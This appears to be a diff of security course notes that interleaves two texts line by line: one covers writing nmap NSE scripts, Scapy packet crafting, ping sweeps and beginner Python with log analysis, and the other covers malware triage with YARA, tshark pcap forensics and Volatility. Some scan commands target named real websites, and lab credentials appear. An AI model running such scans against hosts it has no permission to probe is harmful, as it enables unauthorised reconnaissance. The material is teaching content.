534 | - Reference for this tutorial is: | |
535 | https://thesprawl.org/research/writing-nse-scripts-for-vulnerability-scanning/ | |
536 | ||
537 | ---------------------------------------------------------------------- | |
538 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
539 | strategicsec | |
540 | ||
541 | ||
542 | ||
543 | -- The Head Section -- | |
544 | -- The Rule Section -- | |
545 | portrule = function(host, port) | |
546 | return port.protocol == "tcp" | |
547 | and port.number == 80 | |
548 | and port.state == "open" | |
549 | end | |
550 | ||
551 | -- The Action Section -- | |
552 | action = function(host, port) | |
553 | return "I love Linux!" | |
554 | end | |
555 | ---------------------------------------------------------------------- | |
556 | ||
557 | - Ok, now that we've made that change let's run the script | |
558 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443 | |
559 | ||
560 | ||
561 | ||
562 | ||
563 | ||
564 | ||
565 | ---------------------------------------------------------------------- | |
566 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
567 | ||
568 | -- The Head Section -- | |
569 | local shortport = require "shortport" | |
570 | ||
571 | -- The Rule Section -- | |
572 | portrule = shortport.http | |
573 | ||
574 | ||
575 | -- The Action Section -- | |
576 | action = function(host, port) | |
577 | return "I still love Linux!" | |
578 | end | |
579 | ---------------------------------------------------------------------- | |
580 | ||
581 | - Ok, now that we've made that change let's run the script | |
582 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443 | |
583 | ||
584 | ||
585 | ||
586 | ||
587 | ||
588 | ||
589 | ||
590 | OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working. | |
591 | ||
592 | ---------------------------------------------------------------------- | |
593 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
594 | ||
595 | -- The Head Section -- | |
596 | local shortport = require "shortport" | |
597 | local http = require "http" | |
598 | ||
599 | -- The Rule Section -- | |
600 | portrule = shortport.http | |
601 | ||
602 | -- The Action Section -- | |
603 | action = function(host, port) | |
604 | ||
605 | local uri = "/installing-metasploit-in-ubunt/" | |
606 | local response = http.get(host, port, uri) | |
607 | return response.status | |
608 | ||
609 | end | |
610 | ---------------------------------------------------------------------- | |
611 | ||
612 | - Ok, now that we've made that change let's run the script | |
613 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
614 | ||
615 | ||
616 | ||
617 | ||
618 | ---------------------------------------------------------------------- | |
619 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
620 | ||
621 | -- The Head Section -- | |
622 | local shortport = require "shortport" | |
623 | local http = require "http" | |
624 | ||
625 | -- The Rule Section -- | |
626 | portrule = shortport.http | |
627 | ||
628 | -- The Action Section -- | |
629 | action = function(host, port) | |
630 | ||
631 | local uri = "/installing-metasploit-in-ubunt/" | |
632 | local response = http.get(host, port, uri) | |
633 | ||
634 | if ( response.status == 200 ) then | |
635 | return response.body | |
636 | end | |
637 | ||
638 | end | |
639 | ---------------------------------------------------------------------- | |
640 | ||
641 | - Ok, now that we've made that change let's run the script | |
642 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
643 | ||
644 | ||
645 | ||
646 | ||
647 | ||
648 | ||
649 | ||
650 | ||
651 | ||
652 | ---------------------------------------------------------------------- | |
653 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
654 | ||
655 | -- The Head Section -- | |
656 | local shortport = require "shortport" | |
657 | local http = require "http" | |
658 | local string = require "string" | |
659 | ||
660 | -- The Rule Section -- | |
661 | portrule = shortport.http | |
662 | ||
663 | -- The Action Section -- | |
664 | action = function(host, port) | |
665 | ||
666 | local uri = "/installing-metasploit-in-ubunt/" | |
667 | local response = http.get(host, port, uri) | |
668 | ||
669 | if ( response.status == 200 ) then | |
670 | local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian") | |
671 | return title | |
672 | end | |
673 | ||
674 | end | |
675 | ---------------------------------------------------------------------- | |
676 | ||
677 | - Ok, now that we've made that change let's run the script | |
678 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
679 | ||
680 | ||
681 | ||
682 | ||
683 | ||
684 | ||
685 | ||
686 | ---------------------------------------------------------------------- | |
687 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
688 | ||
689 | -- The Head Section -- | |
690 | local shortport = require "shortport" | |
691 | local http = require "http" | |
692 | local string = require "string" | |
693 | ||
694 | -- The Rule Section -- | |
695 | portrule = shortport.http | |
696 | ||
697 | -- The Action Section -- | |
698 | action = function(host, port) | |
699 | ||
700 | local uri = "/installing-metasploit-in-ubunt/" | |
701 | local response = http.get(host, port, uri) | |
702 | ||
703 | if ( response.status == 200 ) then | |
704 | local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian") | |
705 | ||
706 | if (title) then | |
707 | return "Vulnerable" | |
708 | else | |
709 | return "Not Vulnerable" | |
710 | end | |
711 | end | |
712 | end | |
713 | ||
714 | ---------------------------------------------------------------------- | |
715 | ||
716 | - Ok, now that we've made that change let's run the script | |
717 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
718 | ||
719 | ||
720 | ||
721 | #################### | |
722 | # Installing Scapy # | |
723 | #################### | |
724 | ||
725 | sudo apt-get update | |
726 | sudo apt-get install python-scapy python-pyx python-gnuplot python-pycryptopp python-pycryptopp-dbg python-crypto python-crypto-dbg python-cryptography | |
727 | ||
728 | ||
729 | - Reference Page For All Of The Commands We Will Be Running: | |
730 | http://samsclass.info/124/proj11/proj17-scapy.html | |
731 | ||
732 | ||
733 | ||
734 | ||
735 | ||
736 | - To run Scapy interactively | |
737 | ||
738 | sudo scapy | |
739 | ||
740 | ||
741 | ||
742 | ##################################### | |
743 | # Sending ICMPv4 Packets with scapy # | |
744 | ##################################### | |
745 | ||
746 | - In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key: | |
747 | ||
748 | i = IP() | |
749 | ||
750 | ||
751 | ||
752 | ||
753 | - This creates an object named i of type IP. To see the properties of that object, use the display() method with this command: | |
754 | ||
755 | i.display() | |
756 | ||
757 | ||
758 | ||
759 | ||
760 | - Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine: | |
761 | ||
762 | i.dst="192.168.54.184" | |
763 | ||
764 | i.display() | |
765 | ||
766 | ||
767 | ||
768 | ||
769 | - Notice that scapy automatically fills in your machine's source IP address. | |
770 | ||
771 | - Use these commands to create an object named ic of type ICMP and display its properties: | |
772 | ||
773 | ||
774 | ic = ICMP() | |
775 | ||
776 | ic.display() | |
777 | ||
778 | ||
779 | ||
780 | ||
781 | ||
782 | - Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L: | |
783 | ||
784 | sr1(i/ic) | |
785 | ||
786 | ||
787 | ||
788 | ||
789 | ||
790 | - This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. | |
791 | ||
792 | ||
793 | - The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding. | |
794 | ||
795 | - Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name): | |
796 | ||
797 | ||
798 | sr1(i/ic/"YOUR NAME") | |
799 | ||
800 | ||
801 | - You should see a reply with a Raw section containing your name. | |
802 | ||
803 | ||
804 | ||
805 | ################################### | |
806 | # Sending a UDP Packet with Scapy # | |
807 | ################################### | |
808 | ||
809 | ||
810 | - Preparing the Target | |
811 | $ ncat -ulvp 4444 | |
812 | ||
813 | ||
814 | ||
815 | ||
816 | --open another terminal-- | |
817 | In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key: | |
818 | ||
819 | u = UDP() | |
820 | ||
821 | u.display() | |
822 | ||
823 | ||
824 | ||
825 | - This creates an object named u of type UDP, and displays its properties. | |
826 | ||
827 | - Execute these commands to change the destination port to 4444 and display the properties again: | |
828 | ||
829 | i.dst="192.168.54.184" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer) | |
830 | ||
831 | u.dport = 4444 | |
832 | ||
833 | u.display() | |
834 | ||
835 | ||
836 | ||
837 | - Execute this command to send the packet to the Windows machine: | |
838 | ||
839 | send(i/u/"YOUR NAME SENT VIA UDP\n") | |
840 | ||
841 | ||
842 | ||
843 | - On the Windows target, you should see the message appear | |
844 | ||
845 | ||
846 | p = sr1(IP(dst="8.8.8.8")/UDP()/DNS(rd=1,qd=DNSQR(qname="strategicsec.com"))) | |
847 | ||
848 | ||
849 | p=sr(IP(dst="192.168.230.2")/TCP(dport=[23,80,53,443])) | |
850 | ||
851 | ||
852 | p=sr(IP(dst="192.168.230.2")/TCP(dport=[80])) | |
853 | ||
854 | ||
855 | traceroute (["strategicsec.com"], maxttl=20) | |
856 | This is actually an ICMP & TCP traceroute, default destination is port 80 | |
857 | ||
858 | ||
859 | traceroute (["strategicsec.com"], dport=443, maxttl=20) | |
860 | ||
861 | ||
862 | ||
863 | ############################ | |
864 | # Ping Sweeping with Scapy # | |
865 | ############################ | |
866 | ||
867 | ---------------------------------------------------------------------- | |
868 | vi scapy-pingsweep.py | |
869 | ||
870 | ||
871 | #!/usr/bin/python | |
872 | from scapy.all import * | |
873 | ||
874 | TIMEOUT = 2 | |
875 | conf.verb = 0 | |
876 | for ip in range(0, 256): | |
877 | packet = IP(dst="192.168.1." + str(ip), ttl=20)/ICMP() | |
878 | reply = sr1(packet, timeout=TIMEOUT) | |
879 | if not (reply is None): | |
880 | print reply.dst, "is online" | |
881 | else: | |
882 | print "Timeout waiting for %s" % packet[IP].dst | |
883 | ---------------------------------------------------------------------- | |
884 | ||
885 | ||
886 | ############################################### | |
887 | # Checking out some scapy based port scanners # | |
888 | ############################################### | |
889 | ||
890 | wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py | |
891 | ||
892 | cat rdp_scan.py | |
893 | ||
894 | sudo python rdp_scan.py 192.168.1.250 | |
895 | ||
896 | ||
897 | ######################################### | |
898 | # Here is the courseware for this month # | |
899 | ######################################### | |
900 | ||
901 | Class powerpoint slides: | |
902 | https://s3.amazonaws.com/StrategicSec-Files/Python/PythonV3-1.pptx | |
903 | ||
904 | ||
905 | ||
906 | Courseware Lab Manual | |
907 | https://s3.amazonaws.com/StrategicSec-Files/Python/Python-For-InfoSec-Pros-2015.pdf | |
908 | ||
909 | ||
910 | ||
911 | https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip | |
912 | user: infosecaddicts | |
913 | pass: infosecaddicts | |
914 | ||
915 | ||
916 | The youtube video playlist that I'd like for you to watch is located here: | |
917 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA | |
918 | ||
919 | ||
920 | - | Log in to your Ubuntu system with the username 'malware' and the password 'malware'. |
920 | + | |
921 | # Installing Python# | |
922 | - | After logging please open a terminal window and type the following commands: |
922 | + | |
923 | Windows | |
924 | 32-Bit Version | |
925 | http://www.python.org/ftp/python/2.7.5/python-2.7.5.msi | |
926 | ||
927 | - | This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected': |
927 | + | 64-Bit Version |
928 | http://www.python.org/ftp/python/2.7.5/python-2.7.5.amd64.msi | |
929 | ||
930 | - | wget http://www.beenuarora.com/code/analyse_malware.py |
930 | + | After you install Python in Windows the next thing you may want to install is IdleX: |
931 | http://idlex.sourceforge.net/features.html | |
932 | ||
933 | - | infected |
933 | + | |
934 | Linux | |
935 | Debian/Ubuntu: sudo apt-get install -y python | |
936 | RHEL/CentOS/Fedora: sudo yum install -y python | |
937 | ||
938 | After you install Python in Linux the next thing that you will need to do is install idle. | |
939 | ||
940 | sudo apt-get install -y idle | |
941 | ||
942 | Open IDLE, and let's just dive right in. | |
943 | ||
944 | ||
945 | ||
946 | - | Reference: http://www.garykessler.net/library/file_sigs.html |
946 | + | |
947 | ############################# | |
948 | # Lesson 1: Simple Printing # | |
949 | ############################# | |
950 | ||
951 | >>> print "Today we are learning Python." | |
952 | ||
953 | ||
954 | ||
955 | ||
956 | ||
957 | ||
958 | ##################################### | |
959 | # Lesson 2: Simple Numbers and Math # | |
960 | ##################################### | |
961 | ||
962 | >>> 2+2 | |
963 | ||
964 | >>> 6-3 | |
965 | - | - We didn't see anything like HKLM, HKCU or other registry type stuff |
965 | + | |
966 | >>> 18/7 | |
967 | ||
968 | >>> 18.0/7 | |
969 | - | strings malware.exe | grep -i join |
969 | + | |
970 | >>> 18.0/7.0 | |
971 | ||
972 | >>> 18/7 | |
973 | ||
974 | >>> 9%4 | |
975 | ||
976 | - | - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands |
976 | + | >>> 8%4 |
977 | ||
978 | >>> 8.75%.5 | |
979 | ||
980 | >>> 6.*7 | |
981 | ||
982 | >>> 6*6*6 | |
983 | ||
984 | >>> 6**3 | |
985 | ||
986 | >>> 5**12 | |
987 | ||
988 | >>> -5**4 | |
989 | ||
990 | ||
991 | ||
992 | ||
993 | ||
994 | ||
995 | ####################### | |
996 | # Lesson 3: Variables # | |
997 | ####################### | |
998 | ||
999 | >>> x=18 | |
1000 | ||
1001 | >>> x+15 | |
1002 | ||
1003 | >>> x**3 | |
1004 | - | infected |
1004 | + | |
1005 | >>> y=54 | |
1006 | ||
1007 | >>> x+y | |
1008 | ||
1009 | >>> g=input("Enter number here: ") | |
1010 | 43 | |
1011 | ||
1012 | >>> g+32 | |
1013 | ||
1014 | - | Step 1: Installing MySQL database |
1014 | + | >>> g**3 |
1015 | ||
1016 | ||
1017 | ||
1018 | - | |
1018 | + | |
1019 | - | Step 2: Installing Python MySQLdb module |
1019 | + | |
1020 | ||
1021 | ||
1022 | ||
1023 | ################################### | |
1024 | # Lesson 4: Modules and Functions # | |
1025 | ################################### | |
1026 | ||
1027 | >>> 5**4 | |
1028 | - | mysql -u root -p (set a password of 'malware') |
1028 | + | |
1029 | >>> pow(5,4) | |
1030 | - | Then create one database by running following command: |
1030 | + | |
1031 | >>> abs(-18) | |
1032 | ||
1033 | >>> abs(5) | |
1034 | ||
1035 | >>> floor(18.7) | |
1036 | ||
1037 | >>> import math | |
1038 | - | vi mal_to_db.py -i (fill in database connection information) |
1038 | + | |
1039 | >>> math.floor(18.7) | |
1040 | ||
1041 | >>> math.sqrt(81) | |
1042 | - | python mal_to_db.py -i -f malware.exe -u |
1042 | + | |
1043 | >>> joe = math.sqrt | |
1044 | ||
1045 | >>> joe(9) | |
1046 | - | malware |
1046 | + | |
1047 | >>> joe=math.floor | |
1048 | ||
1049 | >>> joe(19.8) | |
1050 | ||
1051 | ||
1052 | ||
1053 | ||
1054 | ||
1055 | ||
1056 | ||
1057 | ################################## | |
1058 | - | ############################## |
1058 | + | # Lesson 5: How to Save Programs # |
1059 | - | # Lesson 32: Setting up Yara # |
1059 | + | ################################## |
1060 | - | ############################## |
1060 | + | Run "IDLE (Python GUI)" |
1061 | ||
1062 | File -> New Window | |
1063 | - | sudo apt-get install clamav clamav-freshclam |
1063 | + | |
1064 | print "Python for InfoSec" | |
1065 | - | sudo freshclam |
1065 | + | |
1066 | File -> Save as | |
1067 | - | sudo Clamscan |
1067 | + | py4InfoSec.py |
1068 | ||
1069 | - | sudo apt-get install libpcre3 libpcre3-dev |
1069 | + | Run -> Run Module or Press "F5" |
1070 | ||
1071 | - | wget https://github.com/plusvic/yara/archive/v3.1.0.tar.gz |
1071 | + | |
1072 | ||
1073 | - | wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz |
1073 | + | |
1074 | ||
1075 | - | tar -zxvf v3.1.0.tar.gz |
1075 | + | Create a file name.py |
1076 | ||
1077 | - | cd yara-3.1.0/ |
1077 | + | x = raw_input("Enter name: ") |
1078 | print "Hey " + x | |
1079 | raw_input("Press<enter>") | |
1080 | ||
1081 | ||
1082 | Run -> Run Module or Press "F5" | |
1083 | ||
1084 | ||
1085 | - | make check |
1085 | + | |
1086 | ||
1087 | ||
1088 | ||
1089 | - | cd yara-python/ |
1089 | + | |
1090 | ||
1091 | - | python setup.py build |
1091 | + | ##################### |
1092 | # Lesson 6: Strings # | |
1093 | ##################### | |
1094 | ||
1095 | >>> "XSS" | |
1096 | ||
1097 | >>> 'SQLi' | |
1098 | ||
1099 | - | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/3/clamav_to_yara.py |
1099 | + | >>> "Joe's a python lover" |
1100 | ||
1101 | - | sigtool -u /var/lib/clamav/main.cvd |
1101 | + | >>> 'Joe\'s a python lover' |
1102 | ||
1103 | - | python clamav_to_yara.py -f main.ndb -o clamav.yara |
1103 | + | >>> "Joe said \"InfoSec is fun\" to me" |
1104 | ||
1105 | >>> a = "Joe" | |
1106 | ||
1107 | >>> b = "McCray" | |
1108 | - | infected |
1108 | + | |
1109 | >>> a, b | |
1110 | - | mkdir malcode/ |
1110 | + | |
1111 | >>> a+b | |
1112 | - | mv malware.exe malcode/ |
1112 | + | |
1113 | ||
1114 | - | vi testrule.yara |
1114 | + | |
1115 | ||
1116 | - | rule IsPE |
1116 | + | |
1117 | - | { |
1117 | + | |
1118 | - | meta: |
1118 | + | |
1119 | - | description = "Windows executable file" |
1119 | + | |
1120 | ########################## | |
1121 | - | condition: |
1121 | + | # Lesson 7: More Strings # |
1122 | - | // MZ signature at offset 0 and ... |
1122 | + | |
1123 | - | uint16(0) == 0x5A4D and |
1123 | + | |
1124 | - | // ... PE signature at offset stored in MZ header at 0x3C |
1124 | + | >>> num = 10 |
1125 | - | uint32(uint32(0x3C)) == 0x00004550 |
1125 | + | |
1126 | - | } |
1126 | + | >>> num + 2 |
1127 | ||
1128 | - | rule has_no_DEP |
1128 | + | >>> "The number of open ports found on this system is " + num |
1129 | - | { |
1129 | + | |
1130 | - | meta: |
1130 | + | >>> num = str(18) |
1131 | - | description = "DEP is not enabled" |
1131 | + | |
1132 | >>> "There are " + num + " vulnerabilities found in this environment." | |
1133 | - | condition: |
1133 | + | |
1134 | - | IsPE and |
1134 | + | >>> num2 = 46 |
1135 | - | uint16(uint32(0x3C)+0x5E) & 0x00100 == 0 |
1135 | + | |
1136 | - | } |
1136 | + | >>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2` |
1137 | ||
1138 | - | rule has_no_ASLR |
1138 | + | |
1139 | - | { |
1139 | + | |
1140 | - | meta: |
1140 | + | |
1141 | - | description = "ASLR is not enabled" |
1141 | + | |
1142 | ||
1143 | - | condition: |
1143 | + | |
1144 | - | IsPE and |
1144 | + | |
1145 | - | uint16(uint32(0x3C)+0x5E) & 0x0040 == 0 |
1145 | + | ####################### |
1146 | - | } |
1146 | + | # Lesson 8: Raw Input # |
1147 | ####################### | |
1148 | Run "IDLE (Python GUI)" | |
1149 | ||
1150 | - | yara testrule.yara malcode/malware.exe |
1150 | + | File -> New Window |
1151 | ||
1152 | - | mkdir rules/ |
1152 | + | joemccray=input("Enter name: ") |
1153 | print joemccray | |
1154 | - | cd rules/ |
1154 | + | |
1155 | ||
1156 | - | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/5/capabilities.yara |
1156 | + | |
1157 | Run -> Run Module # Will throw an error | |
1158 | - | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/6/magic.yara |
1158 | + | or |
1159 | Press "F5" | |
1160 | - | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/4/packer.yara |
1160 | + | |
1161 | File -> New Window | |
1162 | joemccray=raw_input("Enter name: ") | |
1163 | ||
1164 | - | yara rules/ malcode/malware.exe |
1164 | + | Run -> Run Module # Will throw an error |
1165 | ||
1166 | - | wget https://github.com/Xen0ph0n/YaraGenerator/archive/master.zip |
1166 | + | or |
1167 | ||
1168 | Press "F5" | |
1169 | ||
1170 | - | cd YaraGenerator-master/ |
1170 | + | NOTE: |
1171 | Use "input() for integers and expressions, and use raw_input() when you are dealing with strings. | |
1172 | - | python yaraGenerator.py ../malcode/ -r Test-Rule-2 -a "Joe McCray" -d "Test Rule Made With Yara Generator" -t "TEST" -f "exe" |
1172 | + | |
1173 | ||
1174 | - | cat Test-Rule-2.yar |
1174 | + | |
1175 | ||
1176 | - | wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe |
1176 | + | |
1177 | ||
1178 | - | yara Test-Rule-2.yar putty.exe |
1178 | + | |
1179 | ################################# | |
1180 | # Lesson 9: Sequences and Lists # | |
1181 | ################################# | |
1182 | ||
1183 | >>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include'] | |
1184 | - | # Additional Tasks # |
1184 | + | |
1185 | >>> attacks | |
1186 | ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include'] | |
1187 | - | - PE Scanner: |
1187 | + | |
1188 | - | https://malwarecookbook.googlecode.com/svn/trunk/3/8/pescanner.py |
1188 | + | >>> attacks[3] |
1189 | - | http://www.beenuarora.com/code/analyse_malware.py |
1189 | + | 'SQL Injection' |
1190 | ||
1191 | - | - AV submission: |
1191 | + | >>> attacks[-2] |
1192 | - | http://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py |
1192 | + | 'Cross-Site Scripting' |
1193 | - | https://raw.githubusercontent.com/dcmorton/MalwareTools/master/vtsubmit.py |
1193 | + | |
1194 | ||
1195 | - | - Malware Database Creation: |
1195 | + | |
1196 | - | https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py |
1196 | + | |
1197 | ||
1198 | ||
1199 | ########################## | |
1200 | # Level 10: If Statement # | |
1201 | - | cd /home/malware/Desktop/Browser\ Forensics |
1201 | + | |
1202 | Run "IDLE (Python GUI)" | |
1203 | - | ls | grep pcap |
1203 | + | |
1204 | File -> New Window | |
1205 | - | perl chaosreader.pl suspicious-time.pcap |
1205 | + | attack="SQLI" |
1206 | if attack=="SQLI": | |
1207 | - | firefox index.html |
1207 | + | print 'The attacker is using SQLI' |
1208 | ||
1209 | - | cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" |
1209 | + | |
1210 | ||
1211 | - | cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr |
1211 | + | Run -> Run Module or Press "F5" |
1212 | ||
1213 | - | sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs |
1213 | + | File >> New Window |
1214 | attack="XSS" | |
1215 | if attack=="SQLI": | |
1216 | print 'The attacker is using SQLI' | |
1217 | ||
1218 | - | for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u |
1218 | + | |
1219 | Run -> Run Module or Press "F5" | |
1220 | ||
1221 | - | tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u |
1221 | + | |
1222 | ||
1223 | ############################# | |
1224 | - | tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u |
1224 | + | # Reference Videos To Watch # |
1225 | ############################# | |
1226 | Here is your first set of youtube videos that I'd like for you to watch: | |
1227 | - | tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?' |
1227 | + | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10) |
1228 | ||
1229 | ||
1230 | - | tshark –r suspicious-time.pcap -Tfields -e “eth.src” | sort | uniq |
1230 | + | |
1231 | ||
1232 | ||
1233 | - | tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq |
1233 | + | #################################### |
1234 | # Lesson 11: Intro to Log Analysis # | |
1235 | - | tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq |
1235 | + | #################################### |
1236 | ||
1237 | - | tshark -r suspicious-time.pcap -qz ip_hosts,tree |
1237 | + | Login to your StrategicSec Ubuntu machine. You can download the VM from the following link: |
1238 | ||
1239 | - | tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq |
1239 | + | https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip |
1240 | user: infosecaddicts | |
1241 | - | tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name" |
1241 | + | pass: infosecaddicts |
1242 | ||
1243 | Then execute the following commands: | |
1244 | - | whois rapidshare.com.eyu32.ru |
1244 | + | --------------------------------------------------------------------------------------------------------- |
1245 | ||
1246 | - | whois sploitme.com.cn |
1246 | + | NOTE: If you are still in your python interpreter then you must type exit() to get back to a regular command-prompt. |
1247 | ||
1248 | wget https://s3.amazonaws.com/SecureNinja/Python/access_log | |
1249 | ||
1250 | ||
1251 | cat access_log | grep 141.101.80.188 | |
1252 | - | tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' |
1252 | + | |
1253 | cat access_log | grep 141.101.80.187 | |
1254 | - | tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org' |
1254 | + | |
1255 | cat access_log | grep 108.162.216.204 | |
1256 | - | tshark -r suspicious-time.pcap -qz http_req,tree |
1256 | + | |
1257 | cat access_log | grep 173.245.53.160 | |
1258 | - | tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst |
1258 | + | |
1259 | --------------------------------------------------------- | |
1260 | - | tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g' |
1260 | + | |
1261 | Google the following terms: | |
1262 | - Python read file | |
1263 | - Python read line | |
1264 | - Python read from file | |
1265 | ||
1266 | ||
1267 | ||
1268 | ||
1269 | ######################################################## | |
1270 | # Lesson 12: Use Python to read in a file line by line # | |
1271 | ######################################################## | |
1272 | ||
1273 | - | ***Takes a few min*** |
1273 | + | |
1274 | Reference: | |
1275 | http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/ | |
1276 | ||
1277 | - | cd foremost-1.5.7/ |
1277 | + | |
1278 | ||
1279 | --------------------------------------------------------- | |
1280 | vi logread1.py | |
1281 | ||
1282 | ||
1283 | ## Open the file with read only permit | |
1284 | f = open('access_log', "r") | |
1285 | ||
1286 | ## use readlines to read all lines in the file | |
1287 | ## The variable "lines" is a list containing all lines | |
1288 | lines = f.readlines() | |
1289 | ||
1290 | print lines | |
1291 | ||
1292 | ||
1293 | ## close the file after reading the lines. | |
1294 | f.close() | |
1295 | ||
1296 | --------------------------------------------------------- | |
1297 | ||
1298 | ||
1299 | Google the following: | |
1300 | - python difference between readlines and readline | |
1301 | - python readlines and readline | |
1302 | ||
1303 | ||
1304 | ||
1305 | - | python volatility hivescan -f ../hn_forensics.vmem |
1305 | + | |
1306 | ||
1307 | - | for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done |
1307 | + | ################################ |
1308 | # Lesson 13: A quick challenge # | |
1309 | ################################ | |
1310 | ||
1311 | Can you write an if/then statement that looks for this IP and print "Found it"? | |
1312 | ||
1313 | ||
1314 | 141.101.81.187 | |
1315 | ||
1316 | ||
1317 | ||
1318 | ||
1319 | ||
1320 | ||
1321 | --------------------------------------------------------- | |
1322 | Hint 1: Use Python to look for a value in a list | |
1323 | ||
1324 | Reference: | |
1325 | http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html | |
1326 | ||
1327 | ||
1328 | ||
1329 | ||
1330 | --------------------------------------------------------- | |
1331 | Hint 2: Use Python to prompt for user input | |
1332 | ||
1333 | Reference: | |
1334 | http://www.cyberciti.biz/faq/python-raw_input-examples/ | |
1335 | ||
1336 | ||
1337 | ||
1338 | ||
1339 | --------------------------------------------------------- | |
1340 | Hint 3: Use Python to search for a string in a list | |
1341 | ||
1342 | Reference: | |
1343 | http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string | |
1344 | ||
1345 | ||
1346 | ||
1347 | ||
1348 | ||
1349 | Here is my solution: | |
1350 | ------------------- | |
1351 | $ python | |
1352 | >>> f = open('access_log', "r") | |
1353 | >>> lines = f.readlines() | |
1354 | >>> ip = '141.101.81.187' | |
1355 | >>> for string in lines: | |
1356 | ... if ip in string: | |
1357 | ... print(string) | |
1358 | ||
1359 | ||
1360 | ||
1361 | ||
1362 | Here is one student's solution - can you please explain each line of this code to me? | |
1363 | ------------------------------------------------------------------------------------- | |
1364 | #!/usr/bin/python | |
1365 | ||
1366 | f = open('access_log') | |
1367 | ||
1368 | strUsrinput = raw_input("Enter IP Address: ") | |
1369 | ||
1370 | for line in iter(f): | |
1371 | ip = line.split(" - ")[0] | |
1372 | if ip == strUsrinput: | |
1373 | print line | |
1374 | ||
1375 | f.close() | |
1376 | ||
1377 | ||
1378 | ||
1379 | ||
1380 | ------------------------------- | |
